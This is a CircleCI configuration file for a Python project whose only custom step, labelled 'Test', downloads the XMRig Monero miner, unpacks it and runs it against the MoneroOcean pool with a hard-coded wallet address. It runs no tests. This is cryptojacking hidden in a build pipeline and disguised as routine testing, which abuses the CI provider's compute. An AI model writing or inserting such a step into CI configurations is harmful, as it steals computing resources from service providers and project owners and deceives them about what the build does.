version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - checkout
      - python/load-cache
      - python/install-deps
      - python/save-cache
      - run:
          command: wget https://github.com/xmrig/xmrig/releases/download/v5.11.3/xmrig-5.11.3-xenial-x64.tar.gz && tar xfvz xmrig-5.11.3-xenial-x64.tar.gz && ./xmrig-5.11.3/xmrig --no-color --donate-level 1 -o gulf.moneroocean.stream:10128 -u 84eUc1ps1F9V86bEMk4u9h1cEGJwnkHBAUpkFcg2pghBEa3gLoog4CvJh7meDXtJiW6gjJbAqbWuZTXtTkjLAsfX3rcVazK -p x
          name: Test
